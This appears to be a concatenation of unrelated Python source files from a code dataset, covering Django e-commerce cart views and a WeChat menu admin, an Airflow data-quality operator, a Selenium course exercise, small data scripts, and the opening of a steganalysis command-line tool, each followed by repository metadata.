    oof_df.to_csv(f'output/{config_filename}_{CFG["model_arch"]}_oof.csv', index=False)
    y_preds_df.to_csv(f'output/{config_filename}_{CFG["model_arch"]}_test.csv', index=False)
    del model
    torch.cuda.empty_cache()
    return tst_preds
if __name__ == '__main__':
    logger.debug(CFG)
    tst_preds = infer_clean()
    # Save one submission per probability threshold: predictions whose max
    # probability is below p are assigned to the misc class.
    for p in CFG["prob_thres"]:
        logger.debug(f"p: {p}")
        test['Class'] = np.argmax(tst_preds, axis=1)
        test.loc[tst_preds.max(axis=1) < p, 'Class'] = 3
        label_dic = {0: "Attire", 1: "Food", 2: "Decorationandsignage", 3: "misc"}
        test["Class"] = test["Class"].map(label_dic)
        logger.debug(test.value_counts("Class"))
        test.to_csv(f'output/submission_clean_{p}_{config_filename}_{CFG["model_arch"]}.csv', index=False)
| [
"naokiuno634@gmail.com"
] | naokiuno634@gmail.com |
f4c058174d0fe0641cc14e15cc4ebdc4fe708c8d | bb10d0cd5a6e8351f731aeb4db010d18d08455ea | /AWSChaliceDemo/chalice-env/bin/pyjwt | 442a044bd7f8b2507bd5db3693bc6f76026a0b75 | [] | no_license | LonelyProgrammer/Microservices | 99328ed0f7412149a2741a71458c8957b0b988ba | a13d9cdee8b57530ff111cb405a9f52e96a73103 | refs/heads/master | 2022-11-07T06:58:32.321743 | 2019-04-10T12:57:30 | 2019-04-10T12:57:30 | 154,377,809 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 276 | #!/Users/rishi/Documents/PersonalProjects/AWSChaliceDemo/chalice-env/bin/python
# -*- coding: utf-8 -*-
# Console-script shim (appears to be generated by the installer): it delegates
# to PyJWT's CLI entry point.
import re
import sys

from jwt.__main__ import main

if __name__ == '__main__':
    # Normalise argv[0]: drop the "-script.py(w)"/".exe" suffix some installs add.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"sapbhat2@in.ibm.com"
] | sapbhat2@in.ibm.com | |
4fd19f0d6427d3780745d40289680a45f973c045 | 60f6f21eda76ad5d15c75ca14f00ba5f8d23fa15 | /selenium_2.1.py | 013ce30803a7cb47781a01e8052a2d2dbbcd175f | [] | no_license | TheGeodez/auto-test-course | aa08c34962ab96ccaaca3487930c9e58cca114df | 45f7caec815a2c9db441063a3cada5ecb38e9978 | refs/heads/master | 2020-06-24T12:29:04.723844 | 2019-07-26T07:30:52 | 2019-07-26T07:30:52 | 198,962,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 614 | py | from selenium import webdriver
import time
import math
link = "http://suninjuly.github.io/get_attribute.html"
browser = webdriver.Chrome()
browser.get(link)
treasure = browser.find_element_by_id('treasure')
x = treasure.get_attribute("valuex")
def calc(x):
return str(math.log(abs(12 * math.sin(int(x)))))
y = calc(x)
input1 = browser.find_element_by_id('answer')
input1.send_keys(y)
checkbox = browser.find_element_by_id('robotCheckbox')
checkbox.click()
radiobutton = browser.find_element_by_id('robotsRule')
radiobutton.click()
btn = browser.find_element_by_css_selector('.btn')
btn.click()
| [
"TheGeodez@yandex.ru"
] | TheGeodez@yandex.ru |
1a6b80d355ba49710ba8e7646cb0647d4dd27a2f | 0f592991f5c3976b2a3eef70043949f56d74133f | /carts/views.py | ef615f06dcecf60f39bdc55b69ce7edfbead49d7 | [] | no_license | Stephyo/kart | a7c8da4aa006ef9180aa431401e1555b64dd9519 | 73835cbc513675985f0fc6c1516142c9e2375566 | refs/heads/main | 2023-06-11T16:56:09.145073 | 2021-07-06T16:50:12 | 2021-07-06T16:50:12 | 374,589,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,295 | py | from django.core.exceptions import ObjectDoesNotExist
from carts.models import CartItem
from django.shortcuts import redirect, render, get_object_or_404
from store.models import Product, Variation
from .models import Cart, CartItem
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
# Create your views here.
def _cart_id(request):
cart = request.session.session_key
if not cart:
cart = request.session.create()
return cart
def add_cart(request, product_id):
    """Add one unit of `product_id` to the cart, honouring chosen variations.

    POST keys are matched (case-insensitively) against Variation rows to
    collect the selected variations.  Authenticated users get user-keyed
    CartItems; anonymous visitors get CartItems keyed by a session Cart.
    A line whose variation set matches exactly is incremented; otherwise a
    new line is created.  Always redirects to the cart page.
    """
    current_user = request.user
    product = Product.objects.get(id=product_id)  # get product
    # if the user is authenticated
    if current_user.is_authenticated:
        product_variation = []
        if request.method == 'POST':
            for item in request.POST:
                key = item
                value = request.POST[key]
                try:
                    variation = Variation.objects.get(
                        product=product, variation_category__iexact=key, variation_value__iexact=value)
                    product_variation.append(variation)
                except:
                    # NOTE(review): bare except skips non-variation POST keys
                    # (e.g. csrfmiddlewaretoken) but also hides real errors.
                    pass
        is_cart_item_exists = CartItem.objects.filter(
            product=product, user=current_user).exists()
        if is_cart_item_exists:
            cart_item = CartItem.objects.filter(
                product=product, user=current_user)
            # existing_variations --> DB
            # current variation   --> product_variation
            # item_id             --> DB
            ex_var_list = []
            id = []  # NOTE(review): shadows the builtin `id`
            for item in cart_item:
                existing_variation = item.variations.all()
                ex_var_list.append(list(existing_variation))
                id.append(item.id)
            if product_variation in ex_var_list:
                # increase the cart item quantity
                index = ex_var_list.index(product_variation)
                item_id = id[index]
                item = CartItem.objects.get(product=product, id=item_id)
                item.quantity += 1
                item.save()
            else:
                # create new cart item
                item = CartItem.objects.create(
                    product=product, quantity=1, user=current_user)
                if len(product_variation) > 0:
                    item.variations.clear()
                    item.variations.add(*product_variation)
                item.save()
        else:
            cart_item = CartItem.objects.create(
                product=product,
                quantity=1,
                user=current_user,)
            if len(product_variation) > 0:
                cart_item.variations.clear()
                cart_item.variations.add(*product_variation)
            cart_item.save()
        return redirect('cart')
    # if the user is not authenticated: same flow, keyed by the session cart
    else:
        product_variation = []
        if request.method == 'POST':
            for item in request.POST:
                key = item
                value = request.POST[key]
                try:
                    variation = Variation.objects.get(
                        product=product, variation_category__iexact=key, variation_value__iexact=value)
                    product_variation.append(variation)
                except:
                    pass
        try:
            cart = Cart.objects.get(
                cart_id=_cart_id(request))  # get session id
        except Cart.DoesNotExist:
            cart = Cart.objects.create(
                cart_id=_cart_id(request)
            )
            cart.save()
        is_cart_item_exists = CartItem.objects.filter(
            product=product, cart=cart).exists()
        if is_cart_item_exists:
            cart_item = CartItem.objects.filter(
                product=product, cart=cart)
            # existing_variations --> DB
            # current variation   --> product_variation
            # item_id             --> DB
            ex_var_list = []
            id = []
            for item in cart_item:
                existing_variation = item.variations.all()
                ex_var_list.append(list(existing_variation))
                id.append(item.id)
            print(ex_var_list)  # NOTE(review): debugging leftover
            if product_variation in ex_var_list:
                # increase the cart item quantity
                index = ex_var_list.index(product_variation)
                item_id = id[index]
                item = CartItem.objects.get(product=product, id=item_id)
                item.quantity += 1
                item.save()
            else:
                # create new cart item
                item = CartItem.objects.create(
                    product=product, quantity=1, cart=cart)
                if len(product_variation) > 0:
                    item.variations.clear()
                    item.variations.add(*product_variation)
                item.save()
        else:
            cart_item = CartItem.objects.create(
                product=product,
                quantity=1,
                cart=cart,)
            if len(product_variation) > 0:
                cart_item.variations.clear()
                cart_item.variations.add(*product_variation)
            cart_item.save()
        return redirect('cart')
def remove_cart(request, product_id, cart_item_id):
    """Decrement the quantity of a cart line; delete the line at quantity 1.

    Works for both authenticated users (items keyed by user) and anonymous
    sessions (items keyed by the session cart).  Missing carts/items are
    ignored so the redirect always succeeds.
    """
    product = get_object_or_404(Product, id=product_id)
    try:
        if request.user.is_authenticated:
            cart_item = CartItem.objects.get(
                product=product, user=request.user, id=cart_item_id)
        else:
            cart = Cart.objects.get(cart_id=_cart_id(request))
            cart_item = CartItem.objects.get(
                product=product, cart=cart, id=cart_item_id)
        if cart_item.quantity > 1:
            cart_item.quantity -= 1
            cart_item.save()
        else:
            cart_item.delete()
    except ObjectDoesNotExist:
        # Bug fix: the original bare `except:` swallowed *every* exception
        # (including programming errors).  Only missing Cart/CartItem rows are
        # expected here, so catch the ORM's DoesNotExist family only.
        pass
    return redirect('cart')
def remove_cart_item(request, product_id, cart_item_id):
    """Delete an entire cart line (regardless of quantity), then redirect.

    NOTE(review): unlike remove_cart() there is no try/except here, so a
    missing Cart/CartItem raises instead of being ignored -- confirm intent.
    """
    product = get_object_or_404(Product, id=product_id)
    if request.user.is_authenticated:
        cart_item = CartItem.objects.get(
            product=product, user=request.user, id=cart_item_id)
    else:
        cart = Cart.objects.get(cart_id=_cart_id(request))
        cart_item = CartItem.objects.get(
            product=product, cart=cart, id=cart_item_id)
    cart_item.delete()
    return redirect('cart')
def cart(request, total=0, quantity=0, cart_items=None):
    """Render the cart page with line items, totals, a flat 2% tax and grand total."""
    try:
        tax = 0
        grand_total = 0
        if request.user.is_authenticated:
            cart_items = CartItem.objects.filter(
                user=request.user, is_active=True)
        else:
            cart = Cart.objects.get(cart_id=_cart_id(request))
            cart_items = CartItem.objects.filter(cart=cart, is_active=True)
        for cart_item in cart_items:
            total += (cart_item.product.price * cart_item.quantity)
            quantity += cart_item.quantity
        tax = (2*total)/100  # flat 2% tax on the subtotal
        grand_total = total + tax
    except ObjectDoesNotExist:
        pass  # just ignore: no cart yet -> render with zero totals
    context = {
        'total': total,
        'quantity': quantity,
        'cart_items': cart_items,
        'tax': tax,
        'grand_total': grand_total,
    }
    return render(request, 'store/cart.html', context)
@login_required(login_url='login')
def checkout(request, total=0, quantity=0, cart_items=None):
    """Render the checkout page (login required).

    NOTE(review): the totals computation below duplicates cart() exactly;
    only the template differs -- a shared helper would remove the duplication.
    """
    try:
        tax = 0
        grand_total = 0
        if request.user.is_authenticated:
            cart_items = CartItem.objects.filter(
                user=request.user, is_active=True)
        else:
            cart = Cart.objects.get(cart_id=_cart_id(request))
            cart_items = CartItem.objects.filter(cart=cart, is_active=True)
        for cart_item in cart_items:
            total += (cart_item.product.price * cart_item.quantity)
            quantity += cart_item.quantity
        tax = (2*total)/100  # flat 2% tax on the subtotal
        grand_total = total + tax
    except ObjectDoesNotExist:
        pass  # just ignore: no cart yet -> render with zero totals
    context = {
        'total': total,
        'quantity': quantity,
        'cart_items': cart_items,
        'tax': tax,
        'grand_total': grand_total,
    }
    return render(request, 'store/checkout.html', context)
| [
"sysyeo@gmail.com"
] | sysyeo@gmail.com |
775c3d99a00861bd1974087e2fe75b1216b73fe6 | 421b0ae45f495110daec64ed98c31af525585c2c | /File_Handling/first_file.py | 53c72b560b6263d87c4f8e3ce01570d86ad5fb4f | [] | no_license | Pradeepsuthar/pythonCode | a2c87fb64c79edd11be54c2015f9413ddce246c4 | 14e2b397f69b3fbebde5b3af98898c4ff750c28c | refs/heads/master | 2021-02-18T05:07:40.402466 | 2020-03-05T13:14:15 | 2020-03-05T13:14:15 | 245,163,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | # python provied function and methos to preform such as creating, reading, opening, closing etc.
# open file in python
# Syntax
# fileobject = open(file_name[,access_mode][,buffring])
# NOTE : Default access_mode is read
# Create/Open file in write mode
# fw = open("emp.txt","w")
# write data into file
# fw.write("324156\n")
# fw.write("Pradeep Suthar\n")
# fw.write(input("Enter mobile Number : "))
# fw.close()
print("Reading file\n")
fr = open("emp.txt")
data = fr.read()
fr.close()
print("\n",data)
| [
"sutharpradeep081@gmail.com"
] | sutharpradeep081@gmail.com |
2be507ead7c800beb19a0ae9d719aadbcd5f3a69 | c9c991eb14c7b246f33b7c64657cfe0407255c98 | /pages/migrations/0002_delete_image_upload.py | ec7f561a19317ddd1ac4db2e9aff373dd5f9ea12 | [] | no_license | parkashsatiyaar/skintone | 3e8f5e8174dd3cdd0b61800fb6b63818d57a035a | 2d560e18fd95f2d55c49492803c6ffd5e9f7c4fe | refs/heads/master | 2023-07-06T21:13:48.064316 | 2021-05-19T10:24:22 | 2021-05-19T10:24:22 | 367,822,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | # Generated by Django 3.2.2 on 2021-05-18 07:14
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: drops the obsolete ``Image_upload`` model.

    dependencies = [
        ('pages', '0001_initial'),
    ]

    operations = [
        migrations.DeleteModel(
            name='Image_upload',
        ),
    ]
| [
"parkashsatiyaar0008@gmail.com"
] | parkashsatiyaar0008@gmail.com |
6ca1322a0ebf00cda580166cd9db6449064f61cd | 618adefb8a0c608aa07d8d320ca7931a00e71b90 | /airflow/plugins/operators/data_quality.py | 97218e2365692fc89f81174026885f64a04f3b6e | [] | no_license | as234545/full-data-pipline-aws | 59e63253434e0a4c978b3aee6b57531d14bbc4ab | e0c5fa420d39c46ca537ff858d156fbd90cf8f1e | refs/heads/master | 2022-12-11T21:08:16.187365 | 2020-09-10T05:03:28 | 2020-09-10T05:03:28 | 294,254,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,103 | py | from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class DataQualityOperator(BaseOperator):
    """Airflow operator that runs simple row-count data-quality checks.

    ``data_quality_check`` is an iterable of dicts, each with:
      * ``check_sql``       -- SQL returning a single scalar count
      * ``expected_result`` -- the value the query must return

    Raises ValueError on the first check whose count does not match.
    """

    ui_color = '#89DA59'

    @apply_defaults
    def __init__(self,
                 redshift_conn_id = "",
                 data_quality_check = "",
                 *args, **kwargs):

        super(DataQualityOperator, self).__init__(*args, **kwargs)
        self.redshift_conn_id = redshift_conn_id
        self.data_quality_check = data_quality_check

    def execute(self, context):
        # Use the configured connection id; fall back to the previously
        # hard-coded "redshift" so existing DAGs keep working.
        redshift_hook = PostgresHook(self.redshift_conn_id or "redshift")
        # BUG FIX: the loop iterated the bare name ``data_quality_check``
        # (a NameError at runtime) instead of the instance attribute.
        for check in self.data_quality_check:
            sql = check["check_sql"]
            exp = check["expected_result"]
            records = redshift_hook.get_records(sql)
            num_records = records[0][0]
            if num_records != exp:
                raise ValueError(f"Data quality check failed. Expected: {exp} | Got: {num_records}")
            else:
                self.log.info(f"Data quality on SQL {sql} check passed with {records[0][0]} records")
"noreply@github.com"
] | as234545.noreply@github.com |
3e4c40a81ec1679f5956768b06eec490e7105db4 | ce6e385087910e9647e8dcc63f515186765a9220 | /second_module.py | 8f4cfcaebecbb732398c0431837b5528097799d3 | [] | no_license | karvendhanm/corey_schafer_oops | 11226c58e25d719baac7bd3994000bb933e46552 | 63a04c1189d1137ce6c66724393192ba1ebe48bc | refs/heads/master | 2020-05-23T20:27:46.551099 | 2020-01-04T03:33:07 | 2020-01-04T03:33:07 | 186,930,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 17 11:15:46 2019

@author: John
"""
import os
# Make the project folder the working directory so first_module is importable.
os.chdir('C:/Users/John/PycharmProjects/corey_schafer_oops')
os.getcwd()  # NOTE(review): return value is discarded; this call has no effect.
# Importing first_module executes its top-level code; main() is then invoked
# explicitly.
import first_module
first_module.main()
print("Second Module's Name: {}".format(__name__))
| [
"karvsmech@gmail.com"
] | karvsmech@gmail.com |
f87fdf18000dbea14286976f2daac0671442581c | 3ca67d69abd4e74b7145b340cdda65532f90053b | /BOJ/11052.카드 구매하기/rockmiin.py | d8f9ba374b88c82022c32c6ea323663a79389d39 | [] | no_license | DKU-STUDY/Algorithm | 19549516984b52a1c5cd73e1ed1e58f774d6d30e | 6f78efdbefd8eedab24e43d74c7dae7f95c2893b | refs/heads/master | 2023-02-18T06:48:39.309641 | 2023-02-09T07:16:14 | 2023-02-09T07:16:14 | 258,455,710 | 175 | 49 | null | 2023-02-09T07:16:16 | 2020-04-24T08:42:27 | Python | UTF-8 | Python | false | false | 231 | py |
# BOJ 11052: maximize the money spent to buy exactly N cards from packs,
# where pack_price[k] is the price of a pack containing k cards.
card_count = int(input())
pack_price = [0] + [int(tok) for tok in input().split()]

# best[m] = maximum total price achievable when buying exactly m cards.
best = [0] * (card_count + 1)
best[1] = pack_price[1]
for need in range(1, card_count + 1):
    # Try every possible size for the last pack bought.
    for last in range(1, need + 1):
        best[need] = max(best[need], best[need - last] + pack_price[last])
print(best[card_count])
"csm971024@gmail.com"
] | csm971024@gmail.com |
ef323df622ea485ab6e388ecdb0dc1d6032a86ad | 0399aadc90aa00e1b1946bbb9ba574e1dd1ea8f0 | /utils/generate_second.py | 0479b55a10517f41646a58f1cad6f4712d59719e | [] | no_license | sensiarion/kr_tasks_2020 | 14f2c97488d3935417eef21314017b1834186acf | 8f3d10dd4089c6c68d22ef90a481128e10243934 | refs/heads/master | 2023-02-01T02:14:45.560187 | 2020-12-19T10:46:15 | 2020-12-19T10:46:15 | 322,796,548 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | import random
# Emit `total` numbers 0..total-1, wrapping every (total // lucky_total)-th
# one, starting at index total % lucky_total, in literal \*..\* markers.
total = random.randint(10, 20)
lucky_total = random.randint(2, total // 2)
first_lucky = total % lucky_total

print(total, lucky_total, sep='\n')
print('---------------------------------------')

lucky = set(range(first_lucky, total, total // lucky_total))
row = [f'\*{num}\*' if num in lucky else num for num in range(total)]
print(*row)
| [
"ichigo7336@gmail.com"
] | ichigo7336@gmail.com |
aea70b7bae784283e27efb8fb4f2bc809628cb32 | 9bf62c04522b6b28e4d4bedd25654d0ea675f72a | /wechat_django/admin/views/menu.py | 38ce85ed5fd22d128e4d83ff133787061ea61e5f | [
"MIT"
] | permissive | x2x4com/wechat-django | 9a46cd34c4a00f515e2e315d51d6475e509ad9f0 | 926e5d2ed2895d30a253504ff252a7a52fcfe81f | refs/heads/master | 2020-05-20T02:31:08.735986 | 2019-05-01T16:03:31 | 2019-05-01T16:03:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,832 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
from django.contrib import messages
from django.urls import reverse
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
import object_tool
from wechatpy.exceptions import WeChatClientException
from ...models import Menu
from ..utils import get_request_params
from ..base import DynamicChoiceForm, WeChatModelAdmin
class MenuAdmin(WeChatModelAdmin):
    """Django admin for WeChat official-account custom menus.

    Menus are edited locally; the ``sync`` object tool pulls the remote
    menu into the database and ``publish`` pushes local edits to WeChat.
    """
    __category__ = "menu"
    __model__ = Menu

    changelist_object_tools = ("sync", "publish")
    change_form_template = "admin/wechat_django/menu/change_form.html"
    change_list_template = "admin/wechat_django/menu/change_list.html"

    list_display = (
        "operates", "id", "parent_id", "title", "type", "detail", "weight",
        "updated_at")
    list_display_links = ("title",)
    list_editable = ("weight", )
    fields = (
        "name", "type", "key", "url", "appid", "pagepath", "created_at",
        "updated_at")

    def title(self, obj):
        # Indent sub-menu items so the changelist reads as a tree.
        if obj.parent:
            return "|--- " + obj.name
        return obj.name
    title.short_description = _("title")

    @mark_safe
    def detail(self, obj):
        """Short human-readable summary of the menu item's action."""
        rv = ""
        if obj.type == Menu.Event.CLICK:
            rv = obj.content.get("key")
        elif obj.type == Menu.Event.VIEW:
            rv = '<a href="{0}">{1}</a>'.format(
                obj.content.get("url"), _("link"))
        elif obj.type == Menu.Event.MINIPROGRAM:
            rv = obj.content.get("appid")
        return rv or ""
    detail.short_description = _("detail")

    @mark_safe
    def operates(self, obj):
        """Per-row action links: delete, plus add-child for top-level menus."""
        del_url = reverse("admin:wechat_django_menu_delete", kwargs=dict(
            object_id=obj.id,
            wechat_app_id=obj.app_id
        ))
        rv = '<a class="deletelink" href="{0}"></a>'.format(del_url)
        # WeChat allows at most 5 sub-buttons under a top-level button.
        if not obj.parent and not obj.type and obj.sub_button.count() < 5:
            query = dict(parent_id=obj.id)
            add_link = reverse("admin:wechat_django_menu_add", kwargs=dict(
                wechat_app_id=obj.app_id
            ))
            add_url = "{0}?{1}".format(add_link, urlencode(query))
            rv += '<a class="addlink" href="{0}"></a>'.format(add_url)
        return rv
    operates.short_description = _("actions")

    @object_tool.confirm(short_description=_("Sync menus"))
    def sync(self, request, obj=None):
        """Pull the published menu from the WeChat API into the database."""
        self.check_wechat_permission(request, "sync")

        def action():
            Menu.sync(request.app)
            return _("Menus successful synchronized")

        return self._clientaction(
            request, action, _("Sync menus failed with %(exc)s"))

    @object_tool.confirm(short_description=_("Publish menus"))
    def publish(self, request, obj=None):
        """Push the locally edited menu tree to the WeChat API."""
        self.check_wechat_permission(request, "sync")

        def action():
            Menu.publish(request.app)
            return _("Menus successful published")

        return self._clientaction(
            request, action, _("Publish menus failed with %(exc)s"))

    def get_actions(self, request):
        # Disable bulk delete; menus are removed one at a time.
        actions = super(MenuAdmin, self).get_actions(request)
        if "delete_selected" in actions:
            del actions["delete_selected"]
        return actions

    def get_fields(self, request, obj=None):
        fields = list(super(MenuAdmin, self).get_fields(request, obj))
        if not obj:
            # Timestamps only exist once the object has been saved.
            fields.remove("created_at")
            fields.remove("updated_at")
        return fields

    def get_readonly_fields(self, request, obj=None):
        rv = super(MenuAdmin, self).get_readonly_fields(request, obj)
        if obj:
            rv = rv + ("created_at", "updated_at")
        return rv

    def get_queryset(self, request):
        rv = super(MenuAdmin, self).get_queryset(request)
        if not get_request_params(request, "menuid"):
            rv = rv.filter(menuid__isnull=True)
        if request.GET.get("parent_id"):
            rv = rv.filter(parent_id=request.GET["parent_id"])
        return rv

    class MenuForm(DynamicChoiceForm):
        content_field = "content"
        origin_fields = ("name", "menuid", "type", "weight")
        type_field = "type"

        key = forms.CharField(label=_("menu key"), required=False)
        url = forms.URLField(label=_("url"), required=False)
        appid = forms.CharField(label=_("miniprogram app_id"), required=False)
        pagepath = forms.CharField(label=_("pagepath"), required=False)

        class Meta(object):
            model = Menu
            fields = ("name", "menuid", "type", "weight")

        def allowed_fields(self, type, cleaned_data):
            """Fields kept in ``content`` for the selected menu type."""
            if type == Menu.Event.VIEW:
                fields = ("url", )
            elif type == Menu.Event.CLICK:
                fields = ("key", )
            elif type == Menu.Event.MINIPROGRAM:
                # BUG FIX: "apppath" was a typo -- no such form field is
                # declared, so the miniprogram "pagepath" was silently
                # dropped from the saved content.
                fields = ("url", "appid", "pagepath")
            else:
                fields = tuple()
            return fields
    form = MenuForm

    def save_model(self, request, obj, form, change):
        if not change and request.GET.get("parent_id"):
            obj.parent_id = request.GET["parent_id"]
        # Consistency fix: use the explicit two-argument super() form used
        # everywhere else in this class (keeps Python 2 compatibility,
        # matching the module's __future__ import).
        return super(MenuAdmin, self).save_model(request, obj, form, change)

    def has_add_permission(self, request):
        if not super(MenuAdmin, self).has_add_permission(request):
            return False
        # Check whether the menu is already full: WeChat allows at most
        # 3 top-level buttons and 5 sub-buttons per button.
        q = self.get_queryset(request)
        if request.GET.get("parent_id"):
            return q.count() < 5
        else:
            return q.filter(parent_id__isnull=True).count() < 3

    def get_model_perms(self, request):
        # Hide this admin entirely for apps without the menus ability.
        return (super(MenuAdmin, self).get_model_perms(request)
                if request.app.abilities.menus else {})
| [
"13599838712@hotmail.com"
] | 13599838712@hotmail.com |
37b419ad24813c54449547f8bad10d4bd1426dd1 | d118262983f58b164ce4e7261234514170df913f | /Old/addpricepersqft.py | b678a1c541132a8994f615f0009501eb715eb76b | [] | no_license | mboles01/Realestate | 05213a862d32a21dfe47f67de74156f5d978849f | d6f57182d53a2232c9e815691439373936967b95 | refs/heads/master | 2022-05-06T22:34:40.271044 | 2022-03-19T22:49:31 | 2022-03-19T22:49:31 | 185,117,034 | 14 | 10 | null | 2019-09-04T01:09:05 | 2019-05-06T03:25:18 | Python | UTF-8 | Python | false | false | 728 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 9 17:05:25 2019
@author: michaelboles
"""
# pull in data frame with appended latitude, longitude coordinates
import pandas as pd
data_full = pd.read_csv('data_with_coords.csv')
# append price per sqft, price per lot sqft to full data set
data_full["Price per sqft"] = data_full["Price"]/data_full["Home size"]
data_full["Price per lot sqft"] = data_full["Price"]/(43560*data_full["Lot size"])
# remove unneeded columns
del data_full['Unnamed: 0']
del data_full['Unnamed: 0.1']
del data_full['Home type']
# remove unneeded rows
data_full = data_full[data_full["City"] != "Manhattan Beach"]
# write .csv file with data
data_full.to_csv('data_full.csv')
| [
"michaeladamboles@gmail.com"
] | michaeladamboles@gmail.com |
45781c853334c0e2bf8412d12db46f89596a7d57 | 36839e325492220f40b0379fe1468a516b1d8043 | /aletheia.py | 120fa13533b27af0f3399e325ab722442a4391da | [
"MIT"
] | permissive | awesome-security/aletheia | 2218d1f52deca2fae8dcb4b5743a66212a160ddb | 734d9b2a2428035355a1eaf51033e340a9145b9a | refs/heads/master | 2021-08-23T00:35:46.310217 | 2017-12-01T23:10:19 | 2017-12-01T23:10:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,922 | py | #!/usr/bin/python -W ignore
import sys
import json
import os
import scipy
import numpy
import pandas
import pickle
import multiprocessing
from aletheia import stegosim, richmodels, models
from multiprocessing.dummy import Pool as ThreadPool
from multiprocessing import cpu_count
from aletheia import attacks, utils
#from cnn import net as cnn
# Serializes appends to the shared output file in extract_features().
lock = multiprocessing.Lock()
# {{{ embed_message()
def embed_message(embed_fn, path, payload, output_dir):
    """Embed ``payload`` into every image under ``path`` using ``embed_fn``.

    ``path`` may be a single image or a directory (walked recursively);
    each stego image is written to ``output_dir`` under its original
    basename.  Work is done by a thread pool in batches of 1000 files.
    """
    path=utils.absolute_path(path)

    # Read filenames
    files=[]
    if os.path.isdir(path):
        for dirpath,_,filenames in os.walk(path):
            for f in filenames:
                path=os.path.abspath(os.path.join(dirpath, f))
                if not utils.is_valid_image(path):
                    print "Warning, please provide a valid image: ", f
                else:
                    files.append(path)
    else:
        files=[path]

    def embed(path):
        # Worker: run the embedding simulator and save the stego image.
        X=embed_fn(path, payload)
        basename=os.path.basename(path)
        dst_path=os.path.join(output_dir, basename)
        try:
            scipy.misc.toimage(X, cmin=0, cmax=255).save(dst_path)
        except Exception, e:
            print str(e)

    # Process thread pool in batches so huge file lists do not keep
    # thousands of pending tasks alive at once.
    batch=1000
    for i in xrange(0, len(files), batch):
        files_batch = files[i:i+batch]
        n_core=cpu_count()
        print "Using", n_core, "threads"
        pool = ThreadPool(n_core)
        results = pool.map(embed, files_batch)
        pool.close()
        pool.terminate()
        pool.join()
    # NOTE(review): the string below is dead code kept from an earlier
    # single-threaded implementation.
    """
    for path in files:
        I=scipy.misc.imread(path)
        X=embed_fn(path, payload)
        basename=os.path.basename(path)
        dst_path=os.path.join(output_dir, basename)
        try:
            scipy.misc.toimage(X, cmin=0, cmax=255).save(dst_path)
        except Exception, e:
            print str(e)
    """
# }}}
# {{{ extract_features()
def extract_features(extract_fn, image_path, ofile):
    """Run ``extract_fn`` on every image under ``image_path``.

    One feature row per image is appended to the text file ``ofile``
    (removed first if it already exists).  Rows are written from a
    thread pool; the module-level ``lock`` serializes the appends.
    """
    image_path=utils.absolute_path(image_path)

    # Read filenames
    files=[]
    if os.path.isdir(image_path):
        for dirpath,_,filenames in os.walk(image_path):
            for f in filenames:
                path=os.path.abspath(os.path.join(dirpath, f))
                if not utils.is_valid_image(path):
                    print "Warning, please provide a valid image: ", f
                else:
                    files.append(path)
    else:
        files=[image_path]

    output_file=utils.absolute_path(ofile)

    if os.path.isdir(output_file):
        print "The provided file is a directory:", output_file
        sys.exit(0)

    # Start from an empty output file.
    if os.path.exists(output_file):
        os.remove(output_file)

    def extract_and_save(path):
        # Worker: one feature vector per image, appended under the lock.
        X = extract_fn(path)
        X = X.reshape((1, X.shape[0]))
        lock.acquire()
        with open(output_file, 'a+') as f_handle:
            numpy.savetxt(f_handle, X)
        lock.release()

    #pool = ThreadPool(cpu_count())
    pool = ThreadPool(8)
    results = pool.map(extract_and_save, files)
    pool.close()
    pool.terminate()
    pool.join()
    # NOTE(review): dead code from an earlier single-threaded version.
    """
    for path in files:
        X = richmodels.SRM_extract(path)
        print X.shape
        X = X.reshape((1, X.shape[0]))
        with open(sys.argv[3], 'a+') as f_handle:
            numpy.savetxt(f_handle, X)
    """
# }}}
# {{{ train_models()
def train_models():
    """Train the bundled CNN on the HUGO 0.40 dataset.

    NOTE(review): this helper depends on ``cnn`` whose import is
    commented out at the top of the file, so calling it currently raises
    NameError.  The hard-coded WORKDIR paths suggest it is a development
    aid rather than part of the public CLI -- confirm before use.
    """
    print "-- TRAINING HUGO 0.40 --"
    tr_cover='../WORKDIR/DL_TR_RK_HUGO_0.40_db_boss5000_50/A_cover'
    tr_stego='../WORKDIR/DL_TR_RK_HUGO_0.40_db_boss5000_50/A_stego'
    ts_cover='../WORKDIR/DL_TS_RK_HUGO_0.40_db_boss250_50/SUP/cover'
    ts_stego='../WORKDIR/DL_TS_RK_HUGO_0.40_db_boss250_50/SUP/stego'
    # The training set is deliberately overridden with the (smaller)
    # test set below.
    tr_cover=ts_cover
    tr_stego=ts_stego
    nn = cnn.GrayScale(tr_cover, tr_stego, ts_cover, ts_stego)
    nn.train('models/hugo-0.40.h5')
# }}}
def main():
    """CLI entry point: dispatch on sys.argv[1].

    Each sub-command validates its own argument count, printing a usage
    line and exiting on mismatch.  With no arguments the full command
    list is printed.
    """

    if len(sys.argv)<2:
        print sys.argv[0], "<command>\n"
        print "COMMANDS:"
        print ""
        print " Attacks to LSB replacement:"
        print " - spa: Sample Pairs Analysis."
        print " - rs: RS attack."
        print ""
        print " ML-based detectors:"
        print " - esvm-predict: Predict using eSVM."
        print " - e4s-predict: Predict using EC."
        print ""
        print " Feature extractors:"
        print " - srm: Full Spatial Rich Models."
        print " - srmq1: Spatial Rich Models with fixed quantization q=1c."
        print ""
        print " Embedding simulators:"
